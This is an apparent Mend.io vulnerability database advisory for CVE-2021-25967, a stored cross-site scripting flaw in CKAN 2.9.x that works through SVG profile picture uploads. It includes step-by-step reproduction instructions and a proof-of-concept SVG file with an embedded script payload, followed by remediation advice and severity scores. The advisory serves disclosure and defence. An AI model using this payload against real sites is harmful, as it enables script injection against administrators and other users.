Mend.io Vulnerability Database

What is a CVE vulnerability ID? icon What is a WS vulnerability ID? icon What is an MSC vulnerability ID? icon
New vulnerability? Tell us about it!
icon

We found results for “

CVE-2021-25967

Date: December 1, 2021

Overview

In CKAN, versions 2.9.0 to 2.9.3 are affected by a stored XSS vulnerability via SVG file upload of users’ profile picture. This allows low privileged application users to store malicious scripts in their profile picture. These scripts are executed in a victim’s browser when they open the malicious profile picture

Details

The “CKAN” application is affected by a stored XSS vulnerability via SVG file upload of users’ profile picture that allows low privileged application users to store malicious scripts in their profile picture. These scripts are executed in a victim’s browser when they open the malicious profile picture.

PoC Details

Register as a new user in the application (For demonstration purposes, we will call him “Bob”). Fill in all the required fields and upload a malicious svg file, such as given below.
Now open the application in a private window and login to the application as an administrator user.
Go to Users, “Bob”, and right click the profile picture. Click on “Open Image in New Tab” and see the malicious payload being triggered.

PoC Code

// Malicious SVG file contents:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>

Affected Environments

PyPI: 2.9.0 through 2.9.4; Github: ckan-2.9.0 through ckan-2.9.4

Remediation

Our suggestion here is to implement CSP to disallow inline Javascript, or use the “content-disposition: attachment” header which forces the file to get downloaded.

Prevention

No fix was provided by the maintainer.

Language: Python

Good to know:

icon
icon

Cross-Site Scripting (XSS)

CWE-79
icon

Upgrade Version

No fix version available

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None
Additional information:

Related Resources (4)

https://github.com/ckan/ckan/commit/5a46989c0a4f2c2873ca182c196da83b82babd25
https://nvd.nist.gov/vuln/detail/CVE-2021-25967
https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25967
https://www.mend.io/vulnerability-database/CVE-2021-25967